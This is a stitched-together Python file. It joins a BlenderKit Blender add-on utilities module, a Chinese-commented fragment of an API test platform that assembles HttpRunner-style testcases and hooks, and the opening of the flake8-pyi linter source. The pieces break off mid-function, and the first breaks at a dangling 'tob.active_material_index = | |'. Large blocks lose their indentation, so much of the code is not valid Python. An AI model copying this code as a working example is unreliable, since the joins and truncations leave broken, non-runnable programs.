# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
if "bpy" in locals():
    # Add-on is being reloaded (script reload in Blender): refresh the
    # already-imported submodule instead of importing it again.
    # importlib.reload replaces the long-deprecated imp.reload.
    import importlib
    importlib.reload(paths)
else:
    from blenderkit import paths, categories
import bpy
from mathutils import Vector
import json
import os
import requests
def activate(ob):
    # Make `ob` the only selected object and set it as the active object.
    bpy.ops.object.select_all(action='DESELECT')
    ob.select_set(True)
    bpy.context.view_layer.objects.active = ob
def selection_get():
    """Snapshot the current selection state as (active_object,
    selected_objects), restorable later with selection_set()."""
    context = bpy.context
    return (context.active_object, context.selected_objects)
def selection_set(sel):
    # Restore a selection snapshot made by selection_get():
    # sel[0] is the active object, sel[1] the list of selected objects.
    bpy.ops.object.select_all(action='DESELECT')
    bpy.context.view_layer.objects.active = sel[0]
    for ob in sel[1]:
        ob.select_set(True)
def get_active_model():
    """Return the topmost parent of the active object, or None when the
    context has no 'active_object' attribute."""
    if not hasattr(bpy.context, 'active_object'):
        return None
    root = bpy.context.active_object
    while root.parent is not None:
        root = root.parent
    return root
def get_selected_models():
    # Reduce the selection to a list of top-level "model" roots: for each
    # selected object walk up the parent chain, marking visited objects in
    # `done` so a shared ancestor chain is only walked once, and collect the
    # first not-yet-seen ancestor whose blenderkit name is non-empty.
    obs = bpy.context.selected_objects[:]
    done = {}
    parents = []
    for ob in obs:
        if ob not in done:
            while ob.parent is not None and ob not in done:
                done[ob] = True
                ob = ob.parent
            if ob not in parents and ob not in done:
                if ob.blenderkit.name != '':
                    parents.append(ob)
            done[ob] = True
    return parents
def get_search_props():
    """Return the scene's search property group for the UI's current asset
    type, or None when the group is missing or not implemented."""
    scene = bpy.context.scene
    asset_type = scene.blenderkitUI.asset_type
    # Maps asset type -> (scene attribute, whether the group is usable).
    # Texture search properties are not wired up yet, hence False.
    prop_attrs = {
        'MODEL': ('blenderkit_models', True),
        'SCENE': ('blenderkit_scene', True),
        'MATERIAL': ('blenderkit_mat', True),
        'TEXTURE': ('blenderkit_tex', False),
        'BRUSH': ('blenderkit_brush', True),
    }
    if asset_type not in prop_attrs:
        return None
    attr, usable = prop_attrs[asset_type]
    if not hasattr(scene, attr):
        return None
    return getattr(scene, attr) if usable else None
def get_active_asset():
    # Return the datablock the UI currently treats as "the asset": the root
    # model object, the scene itself, the active material, or the active
    # brush.  None for textures and any unresolved case.
    scene = bpy.context.scene
    ui_props = scene.blenderkitUI
    if ui_props.asset_type == 'MODEL':
        if bpy.context.active_object is not None:
            ob = get_active_model()
            return ob
    if ui_props.asset_type == 'SCENE':
        return bpy.context.scene
    elif ui_props.asset_type == 'MATERIAL':
        if bpy.context.active_object is not None and bpy.context.active_object.active_material is not None:
            return bpy.context.active_object.active_material
    elif ui_props.asset_type == 'TEXTURE':
        return None
    elif ui_props.asset_type == 'BRUSH':
        b = get_active_brush()
        if b is not None:
            return b
    return None
def get_upload_props():
    # Return the blenderkit upload property group for the UI's current asset
    # type (root model object, scene, active material, or active brush).
    # None for textures and any unresolved case.
    scene = bpy.context.scene
    ui_props = scene.blenderkitUI
    if ui_props.asset_type == 'MODEL':
        if bpy.context.active_object is not None:
            ob = get_active_model()
            return ob.blenderkit
    if ui_props.asset_type == 'SCENE':
        s = bpy.context.scene
        return s.blenderkit
    elif ui_props.asset_type == 'MATERIAL':
        if bpy.context.active_object is not None and bpy.context.active_object.active_material is not None:
            return bpy.context.active_object.active_material.blenderkit
    elif ui_props.asset_type == 'TEXTURE':
        return None
    elif ui_props.asset_type == 'BRUSH':
        b = get_active_brush()
        if b is not None:
            return b.blenderkit
    return None
def previmg_name(index, fullsize=False):
    """Return the hidden datablock name for preview image number `index`,
    optionally the full-size variant."""
    prefix = '.bkit_preview_full_' if fullsize else '.bkit_preview_'
    return prefix + str(index).zfill(2)
def get_active_brush():
    """Return the brush of the current sculpt or image-paint mode, or None
    when neither mode is active."""
    context = bpy.context
    if context.sculpt_object:
        return context.tool_settings.sculpt.brush
    # could be just else, but for future possible more types...
    if context.image_paint_object:
        return context.tool_settings.image_paint.brush
    return None
def load_prefs():
    # Load the API key and global directory from the on-disk settings file
    # into the add-on preferences.
    user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
    # if user_preferences.api_key == '':
    fpath = paths.BLENDERKIT_SETTINGS_FILENAME
    if os.path.exists(fpath):
        with open(fpath, 'r') as s:
            prefs = json.load(s)
            # NOTE(review): raises KeyError if either key is missing --
            # presumably the file is always written by save_prefs(); confirm.
            user_preferences.api_key = prefs['API_key']
            user_preferences.global_dir = prefs['global_dir']
def save_prefs(self, context):
    """Persist add-on preferences (API key, global dir) to the BlenderKit
    settings file and Blender's saved userprefs.

    Used as a property update callback, hence the (self, context) signature.
    An API key of implausible length resets the field and reports an error.
    """
    # print(type(context),type(bpy.context))
    # Background instances (e.g. render workers) must not touch preferences.
    if not bpy.app.background and hasattr(bpy.context, 'view_layer'):
        user_preferences = bpy.context.preferences.addons['blenderkit'].preferences
        if user_preferences.api_key != '':
            if len(user_preferences.api_key) > 35:
                prefs = {
                    'API_key': user_preferences.api_key,
                    'global_dir': user_preferences.global_dir,
                }
                # user_preferences.api_key = user_preferences.api_key.strip()
                fpath = paths.BLENDERKIT_SETTINGS_FILENAME
                # BUGFIX: the old code also did `f = open(fpath, 'w')` right
                # before the `with`, leaking an open file handle.  The `with`
                # block alone is sufficient and closes the file properly.
                with open(fpath, 'w') as s:
                    json.dump(prefs, s)
                bpy.ops.wm.save_userpref()
            else:
                # reset the api key in case the user writes some nonsense, e.g. a search string instead of the Key
                user_preferences.api_key = ''
                props = get_search_props()
                props.report = 'Please paste a correct API Key.'
def load_categories():
    """Copy the bundled category tree into the temp dir, load it into the
    window manager, and reset the active category for every asset type."""
    categories.copy_categories()
    categories_filepath = os.path.join(paths.get_temp_dir(), 'categories.json')
    wm = bpy.context.window_manager
    with open(categories_filepath, 'r') as catfile:
        wm['bkit_categories'] = json.load(catfile)
    # Each asset type starts at its own root category.
    wm['active_category'] = {
        asset_type: [asset_type.lower()]
        for asset_type in ('MODEL', 'SCENE', 'MATERIAL', 'BRUSH')
    }
def get_hidden_image(tpath, bdata_name, force_reload=False):
    """Return a hidden (dot-prefixed) image datablock for `tpath`, loading
    or re-pointing it as needed.

    Falls back to the bundled 'not ready' thumbnail when `tpath` is empty or
    does not exist.  With force_reload=True the image is reloaded from disk
    even when its filepath is unchanged.
    """
    hidden_name = '.%s' % bdata_name
    img = bpy.data.images.get(hidden_name)
    # '//' marks a blend-file-relative path; make it absolute up front.
    # (The old code repeated this normalization inside the branch below and
    # carried unused locals `gap`/`en`; both removed.)
    if tpath.startswith('//'):
        tpath = bpy.path.abspath(tpath)
    if img is None or img.filepath != tpath:
        if not os.path.exists(tpath) or tpath == '':
            tpath = paths.get_addon_thumbnail_path('thumbnail_notready.jpg')
        if img is None:
            img = bpy.data.images.load(tpath)
            img.name = hidden_name
        elif img.filepath != tpath:
            # Re-point the existing datablock; packed data would shadow the
            # new file, so unpack first.
            if img.packed_file is not None:
                img.unpack(method='USE_ORIGINAL')
            img.filepath = tpath
            img.reload()
    elif force_reload:
        if img.packed_file is not None:
            img.unpack(method='USE_ORIGINAL')
        img.reload()
    return img
def get_thumbnail(name):
    # Load an add-on thumbnail as a hidden (dot-prefixed) image datablock,
    # reusing the datablock when it is already loaded.
    p = paths.get_addon_thumbnail_path(name)
    name = '.%s' % name
    img = bpy.data.images.get(name)
    if img == None:
        img = bpy.data.images.load(p)
        img.name = name
        # NOTE(review): the name is deliberately assigned twice -- presumably
        # a workaround to force the rename when Blender appends a numeric
        # suffix on the first attempt; confirm before removing.
        img.name = name
    return img
def get_brush_props(context):
    """Return the blenderkit property group of the active brush, or None
    when there is no active brush."""
    brush = get_active_brush()
    return None if brush is None else brush.blenderkit
def pprint(data):
    """Print `data` as indented, key-sorted JSON (debugging helper)."""
    formatted = json.dumps(data, indent=4, sort_keys=True)
    print(formatted)
def get_hierarchy(ob):
    """Return `ob` and all of its descendants (depth-first, last child
    first), via an explicit stack."""
    collected = []
    stack = [ob]
    while stack:
        current = stack.pop()
        stack.extend(current.children)
        collected.append(current)
    return collected
def get_bounds_snappable(obs, use_modifiers=False):
    # Axis-aligned bounding box of `obs` expressed in the local space of
    # their topmost parent, then multiplied by the parent's scale.  Only
    # MESH and CURVE objects contribute vertices; if none do, all six
    # bounds are zero.
    # NOTE(review): use_modifiers is accepted but currently unused.
    # progress('getting bounds of object(s)')
    parent = obs[0]
    while parent.parent is not None:
        parent = parent.parent
    maxx = maxy = maxz = -10000000
    minx = miny = minz = 10000000
    s = bpy.context.scene
    obcount = 0  # calculates the mesh obs. Good for non-mesh objects
    matrix_parent = parent.matrix_world
    for ob in obs:
        # bb=ob.bound_box
        mw = ob.matrix_world
        subp = ob.parent
        # while parent.parent is not None:
        #     mw =
        if ob.type == 'MESH' or ob.type == 'CURVE':
            # If to_mesh() works we can use it on curves and any other ob type almost.
            # disabled to_mesh for 2.8 by now, not wanting to use dependency graph yet.
            # NOTE(review): this to_mesh() keyword signature is from the 2.80
            # beta API -- confirm against the Blender version targeted.
            mesh = ob.to_mesh(depsgraph=bpy.context.depsgraph, apply_modifiers=True, calc_undeformed=False)
            # to_mesh(context.depsgraph, apply_modifiers=self.applyModifiers, calc_undeformed=False)
            obcount += 1
            for c in mesh.vertices:
                coord = c.co
                # Transform each vertex into the topmost parent's local space.
                parent_coord = matrix_parent.inverted() @ mw @ Vector(
                    (coord[0], coord[1], coord[2]))  # copy this when it works below.
                minx = min(minx, parent_coord.x)
                miny = min(miny, parent_coord.y)
                minz = min(minz, parent_coord.z)
                maxx = max(maxx, parent_coord.x)
                maxy = max(maxy, parent_coord.y)
                maxz = max(maxz, parent_coord.z)
            # bpy.data.meshes.remove(mesh)
    if obcount == 0:
        minx, miny, minz, maxx, maxy, maxz = 0, 0, 0, 0, 0, 0
    # Scale the bounds by the parent's scale to get snappable dimensions.
    minx *= parent.scale.x
    maxx *= parent.scale.x
    miny *= parent.scale.y
    maxy *= parent.scale.y
    minz *= parent.scale.z
    maxz *= parent.scale.z
    return minx, miny, minz, maxx, maxy, maxz
def get_bounds_worldspace(obs, use_modifiers=False):
    # World-space axis-aligned bounding box of `obs`.  Only MESH and CURVE
    # objects contribute vertices; if none do, all six bounds are zero.
    # NOTE(review): use_modifiers is accepted but currently unused.
    # progress('getting bounds of object(s)')
    s = bpy.context.scene
    maxx = maxy = maxz = -10000000
    minx = miny = minz = 10000000
    obcount = 0  # calculates the mesh obs. Good for non-mesh objects
    for ob in obs:
        # bb=ob.bound_box
        mw = ob.matrix_world
        if ob.type == 'MESH' or ob.type == 'CURVE':
            # NOTE(review): 2.80-beta to_mesh() signature; confirm target API.
            mesh = ob.to_mesh(depsgraph=bpy.context.depsgraph, apply_modifiers=True, calc_undeformed=False)
            obcount += 1
            for c in mesh.vertices:
                coord = c.co
                # Transform each vertex to world space before accumulating.
                world_coord = mw @ Vector((coord[0], coord[1], coord[2]))
                minx = min(minx, world_coord.x)
                miny = min(miny, world_coord.y)
                minz = min(minz, world_coord.z)
                maxx = max(maxx, world_coord.x)
                maxy = max(maxy, world_coord.y)
                maxz = max(maxz, world_coord.z)
    if obcount == 0:
        minx, miny, minz, maxx, maxy, maxz = 0, 0, 0, 0, 0, 0
    return minx, miny, minz, maxx, maxy, maxz
def is_linked_asset(ob):
    """True-ish when `ob` carries asset_data and instances a collection
    (i.e. it is a linked BlenderKit asset)."""
    asset_data = ob.get('asset_data')
    return asset_data and ob.instance_collection is not None
def get_dimensions(obs):
    """Return (dimensions, bbox_min, bbox_max) of `obs` in the snappable
    space computed by get_bounds_snappable()."""
    bounds = get_bounds_snappable(obs)
    bbmin = Vector(bounds[:3])
    bbmax = Vector(bounds[3:])
    return bbmax - bbmin, bbmin, bbmax
def requests_post_thread(url, json, headers):
    """Fire-and-forget POST, intended to be run on a worker thread.

    The response is intentionally ignored (the previous unused `r = ...`
    binding was dropped).  NOTE: the `json` parameter shadows the stdlib
    module name; kept for interface compatibility with existing callers.
    """
    requests.post(url, json=json, verify=True, headers=headers)
def get_headers(api_key):
    """Build the default JSON request headers, adding a Bearer token when
    `api_key` is a non-empty string."""
    headers = {"accept": "application/json"}
    if api_key != '':
        headers["Authorization"] = f"Bearer {api_key}"
    return headers
# map uv cubic and switch of auto tex space and set it to 1,1,1
def automap(target_object=None, target_slot=None, tex_size=1, bg_exception=False):
from blenderkit import bg_blender as bg
s = bpy.context.scene
mat_props = s.blenderkit_mat
if mat_props.automap:
tob = bpy.data.objects[target_object]
# only automap mesh models
if tob.type == 'MESH':
actob = bpy.context.active_object
bpy.context.view_layer.objects.active = tob
# auto tex space
if tob.data.use_auto_texspace:
tob.data.use_auto_texspace = False
tob.data.texspace_size = (1, 1, 1)
if 'automap' not in tob.data.uv_layers:
bpy.ops.mesh.uv_texture_add()
uvl = tob.data.uv_layers[-1]
uvl.name = 'automap'
# TODO limit this to active material
# tob.data.uv_textures['automap'].active = True
scale = tob.scale.copy()
if target_slot is not None:
tob.active_material_index = | |
elif setup["name"] == "setup_wait_until_db_result_succeed":
# setup_cell = "${{setup_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(setup["args"]["wait_time"], setup["args"]["sql"], setup["args"]["expect_value"])
# elif setup["name"] == "setup_server_upload_file":
if setup["name"] == "setup_server_upload_file":
setup_cell = "${{setup_server_upload_file({0}||{1}||{2})}}".format(setup["args"]["ssh_connect"], setup["args"]["local_path"].replace("\\", "/"), setup["args"]["remote_path"].replace("\\", "/"))
else:
if isinstance(setup["args"], dict):
func_args = ''
# for i in setup["args"]:
# if func_args == '':
# func_args += setup["args"][i]
# else:
# func_args += '||{}'.format(setup["args"][i])
for base_key in setup_hook["parameters"]:
for key, value in setup["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(setup["args"], list):
func_args = "||".join(setup["args"])
else:
func_args = setup["args"]
setup_cell = "${{{func_name}({func_args})}}".format(
func_name=setup["name"], func_args=func_args)
testcase["setup_hooks"].append(setup_cell)
# teardown
# teardown_sql_count = 0
for teardown in teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
# if teardown["name"] == "teardown_db_operation":
# teardown_cell = "${{teardown_db_operation({0}||$DB_CONNECT)}}".format(teardown["args"]["sql"])
# elif teardown["name"] == "teardown_wait_until_db_result_succeed":
# teardown_cell = "${{teardown_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(teardown["args"]["wait_time"],teardown["args"]["sql"],teardown["args"]["expect_value"])
if isinstance(teardown["args"], dict):
func_args = ''
# for i in teardown["args"]:
# if func_args == '':
# func_args += teardown["args"][i]
# else:
# func_args += '||{}'.format(teardown["args"][i])
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["teardown_hooks"].append(teardown_cell)
# requestTeardown
for teardown in request_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
args_list = []
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
args_list.append(value)
break
func_args = "||".join(args_list)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["request_teardown_hooks"].append(teardown_cell)
# request(分为HTTP,DUBBO,MQ三种情况)
is_merge = request_info.pop("isMerge", None)
testcase["request"]["isMerge"] = True if is_merge else False
if intf_type == "HTTP":
json_body = request_info.pop("json", None)
sign_func = request_info.pop("sign", None)
empty_check_param_list = request_info.pop("emptyCheckParamList", None)
if json_body is not None:
testcase["request"]["json"] = json_body
if sign_func:
for setup_hook in CUSTOM["sign"]:
if setup_hook["name"] == sign_func:
testcase["setup_hooks"].append(
"${{{sign_func}($request||$REMOTE_HOST)}}".format(sign_func=sign_func)
)
elif intf_type == "DUBBO":
testcase["request"]["json"] = {"args": []}
dubbo_args = request_info.pop("args", None)
if dubbo_args is not None:
if isinstance(dubbo_args, list):
testcase["request"]["json"]["args"] = dubbo_args
else:
testcase["request"]["json"]["args"].append(dubbo_args)
elif intf_type == "MQ":
testcase["request"]["json"] = {"msg": "{}"}
mq_msg = request_info.pop("msg", None)
if mq_msg is not None:
testcase["request"]["json"]["msg"] = mq_msg
hr_request["teststeps"].append(testcase)
# 处理include
include = kwargs.pop("include")
if not isinstance(include, list) or include == []:
include = [{"public_variables": []}]
# include.append({"setup_cases": setup_case_list})
"""加载public_variables"""
intf_variables = re.findall(variable_regexp, str(intf_obj.intf_info))
case_variables = re.findall(variable_regexp, str(testcase))
case_variables.extend(intf_variables)
target_pv_name_list = list(set(case_variables).difference(set(env_variable_list)))
for target_pv_name in target_pv_name_list:
# todo 公共变量作用域
# system_id = ApiIntfInfoManager.get_intf(id=intf_id).api_system_id
system_id = intf_obj.api_system_id
s_var_obj = ApiPublicVariableInfoManager.get_variable(variable_name=target_pv_name, api_system_id=system_id)
if s_var_obj:
if s_var_obj.id not in include[0]["public_variables"]:
include[0]["public_variables"].append(s_var_obj.id)
else:
company_id = ApiSystemInfoManager.get_system(id=system_id).api_company_id
c_var_obj = ApiPublicVariableInfoManager.get_variable(
variable_name=target_pv_name, api_company_id=company_id)
if c_var_obj and c_var_obj.id not in include[0]["public_variables"]:
include[0]["public_variables"].append(c_var_obj.id)
"""保存必填字段校验"""
# if empty_check_params:
# empty_list = [k.strip() for k in str(empty_check_params).strip().strip(',').split(',')]
# include.append({"param_check": {"empty": empty_list}})
if empty_check_param_list:
include.append({"param_check": {"empty": empty_check_param_list}})
# request = change_variable_format(request)
if action == 'add':
ApiTestcaseInfoManager.insert_testcase(
testcase_name=testcase_name,
type=testcase_type,
include=json_dumps(include),
simple_desc=simple_desc,
case_status=0,
api_intf_id=intf_id,
creator=operator,
last_modifier=operator,
expect_result=expect_result,
setup_case_list=json_dumps(setup_cases_list),
last_modify_time=datetime.now(),
)
tc_objs = ApiTestcaseInfoManager.get_testcases_order_by_create_time_desc(
api_intf_id=intf_id, testcase_name=testcase_name, creator=operator, expect_result=expect_result)
if not tc_objs:
logger.error("tc_objs not found")
raise LoadCaseError
else:
testcase_id = tc_objs[0].id
ApiTestcaseRequestManager.insert_request(
api_testcase_id=testcase_id,
request=json_dumps(hr_request),
)
# tcr_obj = ApiTestcaseRequestManager.get_request(api_testcase_id=testcase_id)
# if not tcr_obj:
# logger.error("tcr_obj not found")
# raise LoadCaseError
# else:
# request_id = tcr_obj.id
# ApiTestcaseInfoManager.update_testcase(
# id_=testcase_id,
# api_request_id=request_id,
# )
set_testcase_tag(testcase_id, tag_id_list)
elif action == 'edit':
testcase_id = base.pop("testcaseId")
ApiTestcaseInfoManager.update_testcase(
id_=testcase_id,
testcase_name=testcase_name,
include=json_dumps(include),
simple_desc=simple_desc,
last_modifier=operator,
expect_result=expect_result,
setup_case_list=json_dumps(setup_cases_list),
last_modify_time=datetime.now(),
)
r_obj = ApiTestcaseRequestManager.get_request(api_testcase_id=testcase_id)
ApiTestcaseRequestManager.update_request(
id_=r_obj.id,
request=json_dumps(hr_request),
)
set_testcase_tag(testcase_id, tag_id_list)
# print(json_dumps(hr_request))
def handle_api_testcase_main(action, **kwargs):
"""
新版-保存主测试用例到数据库
:param action:
:param kwargs:
:return:
"""
# 处理base
base = kwargs.pop("base")
tag_id_list = base.pop("tagIdList")
base_intf_id = base.pop("intfId", None)
product_line_id = base.pop("productLineId", None)
main_teardown_info = base.pop("mainTeardownInfo", [])
case_type = base.pop("caseType", 0)
if product_line_id and case_type != 1:
case_type = 2
testcase_name = base.pop("testcaseName")[:200]
simple_desc = base.pop("testcaseDesc", "")[:1000]
expect_result = base.pop("expectResult")[:200]
else:
case_type = 1
# 处理main_teardown_hooks
main_teardown_hooks = []
for teardown in main_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
func_args = ''
for i in teardown["args"]:
if func_args == '':
func_args += teardown["args"][i]
else:
func_args += '||{}'.format(teardown["args"][i])
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
main_teardown_hooks.append(teardown_cell)
# 处理setup_flow
setup_flow = kwargs.pop("setupFlow", None)
if setup_flow:
setup_flow_list = [int(flow_dic["flowCaseId"]) for flow_dic in setup_flow]
else:
setup_flow_list = []
operator = kwargs.pop("userName")
sub_info_list = []
# 处理steps
steps = kwargs.pop("steps")
step_no = 0
# empty_check_params = None
empty_check_param_list = None
for step in steps:
sub_info = {}
step_no += 1
sub_base = step.pop("base")
# 判断是否为引用的子用例
is_referenced_sub = True if not step else False
if is_referenced_sub:
sub_info["sub_id"] = sub_base["subId"]
else:
setup_info = step.pop("setupInfo")
variable_info = step.pop("variableInfo")
request_info = step.pop("requestInfo")
validate_info = step.pop("validateInfo")
extract_info = step.pop("extractInfo")
teardown_info = step.pop("teardownInfo")
request_teardown_info = step.pop("requestTeardownInfo", [])
sub_name = sub_base["subName"][:200]
sub_info["sub_name"] = sub_name
intf_id = sub_base["intfId"] if case_type == 2 else base_intf_id
intf_obj = ApiIntfInfoManager.get_intf(id=intf_id)
intf_type = intf_obj.intf_type
sub_info["request_type"] = map_testcase_type_to_number(intf_type)
sub_info["simple_desc"] = sub_base.get("subDesc", "")[:1000]
sub_info["expect_result"] = sub_base["subExpectResult"][:200]
sub_info["case_type"] = case_type
sub_info["api_intf_id"] = intf_id
if "subId" in sub_base:
sub_info["sub_id"] = sub_base["subId"]
else:
sub_info["sub_id"] = None
hr_request = {
"name": sub_name,
"config": {
"variables": [],
"request": {
"base_url": "",
}
},
"teststeps": []
}
testcase = {
"name": sub_name,
"variables": [],
"request": {},
"validate": [],
"extract": [],
"setup_hooks": [],
"teardown_hooks": [],
"request_teardown_hooks": []
}
# variable
for variable in variable_info:
# 自定义函数
if variable["type"] == "function":
func_args = ''
input_args_dic = variable["args"]
for custom_func in CUSTOM["functions"]:
if custom_func["name"] == variable["value"]:
for x in custom_func["parameters"]:
for input_arg in input_args_dic:
if input_arg == x:
if func_args == '':
func_args += input_args_dic[input_arg]
else:
func_args += '||{}'.format(input_args_dic[input_arg])
testcase["variables"].append({
variable["name"].strip(): "${{{func}({args})}}".format(func=variable["value"], args=func_args)
})
# 数据库
elif variable["type"] == "db":
"""
从
{
"type": "db",
"name": "next_member_id",
"value": "SELECT NEXT_VALUE FROM user_db.sequence WHERE SEQ_NAME='MEMBER_ID';",
"args": {}
}
变换成
{
'next_member_id': '${variable_db_operation(SELECT NEXT_VALUE FROM user_db.sequence WHERE SEQ_NAME=\'MEMBER_ID\';||$DB_CONNECT)}'
},
"""
sql = variable["value"]
default_func = 'variable_db_operation'
testcase["variables"].append({
variable["name"].strip(): "${{{func}({sql}||$DB_CONNECT)}}".format(func=default_func, sql=sql)
})
# key-value
else:
actual_var_value = transfer_to_actual_value(variable)
testcase["variables"].append({
variable["name"].strip(): actual_var_value
})
# validate
for validate in validate_info:
if validate["comparator"] == "db_validate":
validate["check"] += "$DB_CONNECT"
# '''替换validate["expect"]的中文冒号'''
# if ":" in validate["expect"]:
# validate["expect"] = validate["expect"].replace(":", ":")
testcase["validate"].append({
validate["comparator"]: [
validate["check"].strip(), validate["expect"], validate["comment"]
]
})
# extract
for extract in extract_info:
testcase["extract"].append({
extract["saveAs"].strip(): extract["check"]
})
# setup
case_step_count = 0
for setup in setup_info:
'''遇到前置执行用例,跳过'''
if setup["name"] == "execution_testcase":
continue
for setup_hook in CUSTOM["setup-hooks"]:
if setup_hook["name"] == setup["name"]:
if setup["name"] == "setup_db_operation":
setup_cell = "${{setup_db_operation({0}||$DB_CONNECT)}}".format(setup["args"]["sql"])
elif setup["name"] == "setup_wait_until_db_result_succeed":
setup_cell = "${{setup_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(setup["args"]["wait_time"], setup["args"]["sql"], setup["args"]["expect_value"])
elif setup["name"] == "setup_server_upload_file":
setup_cell = "${{setup_server_upload_file({0}||{1}||{2})}}".format(setup["args"]["ssh_connect"], setup["args"]["local_path"].replace("\\", "/"), setup["args"]["remote_path"].replace("\\", "/"))
else:
if isinstance(setup["args"], dict):
func_args = ''
# for i in setup["args"]:
# if func_args == '':
# func_args += setup["args"][i]
# else:
# func_args += '||{}'.format(setup["args"][i])
for base_key in setup_hook["parameters"]:
for key, value in setup["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(setup["args"], list):
func_args = "||".join(setup["args"])
else:
func_args = setup["args"]
setup_cell = "${{{func_name}({func_args})}}".format(
func_name=setup["name"], func_args=func_args)
testcase["setup_hooks"].append(setup_cell)
# teardown
# teardown_sql_count = 0
for teardown in teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if teardown["name"] == "teardown_db_operation":
teardown_cell = "${{teardown_db_operation({0}||$DB_CONNECT)}}".format(teardown["args"]["sql"])
elif teardown["name"] == "teardown_wait_until_db_result_succeed":
teardown_cell = "${{teardown_wait_until_db_result_succeed({0}||{1}||{2}||$DB_CONNECT)}}".format(teardown["args"]["wait_time"],teardown["args"]["sql"],teardown["args"]["expect_value"])
else:
if isinstance(teardown["args"], dict):
func_args = ''
# for i in teardown["args"]:
# if func_args == '':
# func_args += teardown["args"][i]
# else:
# func_args += '||{}'.format(teardown["args"][i])
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
if func_args == '':
func_args += value
else:
func_args += '||{}'.format(value)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["teardown_hooks"].append(teardown_cell)
# requestTeardown
for teardown in request_teardown_info:
for teardown_hook in CUSTOM["teardown-hooks"]:
if teardown_hook["name"] == teardown["name"]:
if isinstance(teardown["args"], dict):
args_list = []
for base_key in teardown_hook["parameters"]:
for key, value in teardown["args"].items():
if key == base_key:
args_list.append(value)
break
func_args = "||".join(args_list)
elif isinstance(teardown["args"], list):
func_args = "||".join(teardown["args"])
else:
func_args = teardown["args"]
teardown_cell = "${{{func_name}({func_args})}}".format(
func_name=teardown["name"], func_args=func_args)
testcase["request_teardown_hooks"].append(teardown_cell)
# request(分为HTTP,DUBBO,MQ三种情况)
is_merge = request_info.pop("isMerge", None)
testcase["request"]["isMerge"] = True if is_merge else False
if intf_type == "HTTP":
json_body = request_info.pop("json", None)
sign_func = request_info.pop("sign", None)
| |
<reponame>KotlinIsland/flake8-pyi<gh_stars>0
#!/usr/bin/env python3
from __future__ import annotations
import argparse
import ast
import logging
import optparse
import re
import sys
from collections import Counter
from collections.abc import Iterable, Iterator, Sequence
from contextlib import contextmanager
from copy import deepcopy
from dataclasses import dataclass, field
from itertools import chain
from pathlib import Path
from typing import ClassVar, NamedTuple
from flake8 import checker # type: ignore
from flake8.plugins.pyflakes import FlakesChecker # type: ignore
from pyflakes.checker import ( # type: ignore[import]
PY2,
ClassDefinition,
ClassScope,
FunctionScope,
ModuleScope,
)
if sys.version_info >= (3, 9):
from ast import unparse
else:
from ast_decompiler import decompile as unparse
__version__ = "20.10.0"  # plugin version reported to flake8
LOG = logging.getLogger("flake8.pyi")  # logger under flake8's namespace
class Error(NamedTuple):
    """A single lint finding: source location, message text, and the
    checker class flake8 should attribute it to."""

    lineno: int
    col: int
    message: str
    type: type
class TypeVarInfo(NamedTuple):
    """A (cls_name, name) pair describing a TypeVar-like definition."""

    cls_name: str
    name: str
# ChainMap and AsyncContextManager do not exist in typing or typing_extensions in Python 2,
# so we can disallow importing them from anywhere except collections and contextlib respectively.
# Y022: aliases in typing/typing_extensions whose canonical home is elsewhere;
# maps each bad import path to the suggested replacement.
_BAD_Y022_IMPORTS = {
    # typing aliases for collections
    "typing.Counter": "collections.Counter",
    "typing.Deque": "collections.deque",
    "typing.DefaultDict": "collections.defaultdict",
    "typing.ChainMap": "collections.ChainMap",
    # typing aliases for builtins
    "typing.Dict": "builtins.dict",
    "typing.FrozenSet": "builtins.frozenset",
    "typing.List": "builtins.list",
    "typing.Set": "builtins.set",
    "typing.Tuple": "builtins.tuple",
    "typing.Type": "builtins.type",
    # One typing alias for contextlib
    "typing.AsyncContextManager": "contextlib.AbstractAsyncContextManager",
    # typing_extensions aliases for collections
    "typing_extensions.Counter": "collections.Counter",
    "typing_extensions.Deque": "collections.deque",
    "typing_extensions.DefaultDict": "collections.defaultdict",
    "typing_extensions.ChainMap": "collections.ChainMap",
    # One typing_extensions alias for a builtin
    "typing_extensions.Type": "builtins.type",
    # one typing_extensions alias for contextlib
    "typing_extensions.AsyncContextManager": "contextlib.AbstractAsyncContextManager",
}
# typing_extensions.ContextManager is omitted from the Y023 and Y027 collections - special-cased
# Y023: names that should be imported from typing, not typing_extensions.
_BAD_Y023_IMPORTS = frozenset(
    {
        # collections.abc aliases
        "Awaitable",
        "Coroutine",
        "AsyncIterable",
        "AsyncIterator",
        "AsyncGenerator",
        # typing aliases
        "Protocol",
